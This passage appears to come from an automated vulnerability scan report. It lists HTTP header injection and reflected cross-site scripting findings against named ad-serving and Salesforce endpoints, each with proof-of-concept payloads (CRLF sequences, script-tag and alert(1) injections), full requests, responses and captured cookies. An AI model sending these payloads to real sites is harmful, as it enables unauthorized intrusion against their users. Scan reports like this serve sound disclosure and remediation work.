Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/79e85
73d9c50a5a7
/scrabble.pogo/load%3Bdcopt%3Dist%3Bag%3Daf41%3Bg%3D0%3Btile%3D1%3Bsz%3D500x350%3Bord%3D910319:
Date: Sun, 09 Jan 2011 02:03:35 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.20. http://ad.doubleclick.net/jump/scrabble.pogo/room [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/scrabble.pogo/room

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 877c2%0d%0a03fa4dd3a61 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /877c2%0d%0a03fa4dd3a61/scrabble.pogo/room HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/877c2
03fa4dd3a61
/scrabble.pogo/room:
Date: Sun, 09 Jan 2011 02:03:24 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.21. http://ad.doubleclick.net/jump/surveys.pogo/misc [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/surveys.pogo/misc

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 64dc6%0d%0ae88543e460e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /64dc6%0d%0ae88543e460e/surveys.pogo/misc HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/64dc6
e88543e460e
/surveys.pogo/misc:
Date: Sun, 09 Jan 2011 02:03:22 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.22. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 452b0%0d%0a6b6ad7cf9b8 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0452b0%0d%0a6b6ad7cf9b8; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0452b0
6b6ad7cf9b8
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:06:27 GMT
Connection: close


2.23. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 62e1e%0d%0a91a63bf7646 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=10.1103&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=62e1e%0d%0a91a63bf7646; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=62e1e
91a63bf7646
&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:02:33 GMT
Connection: close
Content-Length: 0


2.24. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 73be8%0d%0adc5e96035d9 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=73be8%0d%0adc5e96035d9&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=73be8
dc5e96035d9
&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:02:31 GMT
Connection: close
Content-Length: 0


2.25. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 729cd%0d%0a9fe4d8fa7d8 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=10.1103&wmpv=0&res=729cd%0d%0a9fe4d8fa7d8 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=729cd
9fe4d8fa7d8
&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:02:32 GMT
Connection: close
Content-Length: 0


2.26. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 92f47%0d%0a539632693e7 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFold%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.15334939793683589&flv=10.1103&wmpv=92f47%0d%0a539632693e7&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; E2=09MY820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=92f47
539632693e7
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:02:31 GMT
Connection: close
Content-Length: 0


2.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 156ae%0d%0a6ce59d4e5ce was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2111603&PluID=0&w=500&h=350&ord=3732683&ucm=true&ifl=$$ads/eyeblaster/addineyev2.jsp$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B231345033%3B0-0%3B7%3B27597681%3B2361-500/350%3B40124842/40142629/1%3B%3B%7Eaopt%3D3/0/ff/0%3B%7Esscs%3D%3f$$\ HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0156ae%0d%0a6ce59d4e5ce; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 1722
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0156ae
6ce59d4e5ce
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4Ki09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=09MYgA92sF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:06:32 GMT
Connection: close

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

2.28. http://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 39de9%0d%0a757ae29423 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /servlet/39de9%0d%0a757ae29423 HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /servlet/39de9
757ae29423
/
Date: Sun, 09 Jan 2011 02:54:11 GMT
Connection: close
Content-Length: 91

The URL has moved to <a href="/servlet/39de9
757ae29423/">/servlet/39de9
757ae29423/</a>

2.29. https://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /servlet/servlet.WebToLead

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 46573%0d%0a0d8c9d6be83 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /servlet/46573%0d%0a0d8c9d6be83 HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /servlet/46573
0d8c9d6be83
/
Date: Sun, 09 Jan 2011 05:28:21 GMT
Connection: close
Content-Length: 93

The URL has moved to <a href="/servlet/46573
0d8c9d6be83/">/servlet/46573
0d8c9d6be83/</a>

3. Cross-site scripting (reflected)  previous  next
There are 712 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f1a2"><script>alert(1)</script>29d113731ef was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=8f1a2"><script>alert(1)</script>29d113731ef HTTP/1.1
Host: ad.turn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8977556597757145533; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:03:23 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:03:23 GMT
Connection: close

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8977556597757145533&rnd=9049614191795073469&fpid=8f1a2"><script>alert(1)</script>29d113731ef&nu=y&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.2. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae48c'-alert(1)-'49d3e5006f8 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193ae48c'-alert(1)-'49d3e5006f8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJipx9oC)FXduyOWimI4KKhq.W^v=7v!+J; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 10-Jan-2011 02:02:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 09-Apr-2011 02:02:34 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 09 Jan 2011 02:02:34 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193ae48c'-alert(1)-'49d3e5006f8&external_user_id=4760492999213801733&expiration=0" width="0" height="0"/>');

3.3. http://admeld.adnxs.com/usersync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16c38'-alert(1)-'3fc1cb53627 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match16c38'-alert(1)-'3fc1cb53627 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
